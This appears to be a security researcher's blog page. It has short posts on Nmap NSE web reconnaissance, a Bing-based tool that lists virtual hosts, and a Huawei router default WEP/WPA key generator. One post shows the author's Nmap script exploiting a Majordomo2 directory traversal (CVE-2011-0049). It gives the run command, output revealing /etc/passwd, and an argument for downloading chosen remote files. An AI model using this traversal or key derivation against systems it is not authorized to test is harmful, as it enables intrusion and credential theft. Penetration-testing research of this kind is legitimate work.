A few months ago I submitted an article to Pentest Magazine called "Gathering web server information with Nmap NSE".
HTTP response analysis with Nmap
Widely used protocols are always at the mercy of the
developers implementing it and HTTP is no exception.
Specially crafted requests make web servers behave in
its own way and this allow us to do some nifty tricks to
This is my nmap script http-majordomo2-dir-traversal, it exploits a directory traversal vulnerability in Majordomo2 (CVE-2011-0049). Update your Nmap repository to try it
nmap -p80 --script http-majordomo2-dir-traversal <host/ip>
PORT STATE SERVICE
80/tcp open http syn-ack | http-majordomo2-dir-traversal: /etc/passwd was found: | | root:x:0:0:root:/root:/bin/bash | bin:x:1:1:bin:/bin:/sbin/nologin
- http-majordomo2-dir-traversal.rfile - Remote file to download. Default: /etc/passwd
- http-majordomo2-dir-traversal.uri - URI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr
- http-majordomo2-dir-traversal.outfile - If set it saves the remote file to this location.
I created a small web application that uses Bing's results to list all the hostnames pointing to an IP address. This is useful for pentesting services like HTTP servers that behave according to the hostname used. Don't abuse it ;)
We are proud to release our WEP/WPA default key generator for Huawei HG520x and HG530 Gateways. These devices use a weak cipher to generate their default keys and Humberto Ochoa, one of our vulnerability researchers at Websec, did a great job deciphering the algorithm:
Ironically, Prodigy Telmex, the biggest ISP in Mexico, just replaced my old 2wire router with one of these vulnerable modems, a newer and "better" device (According to their technician of course hehe).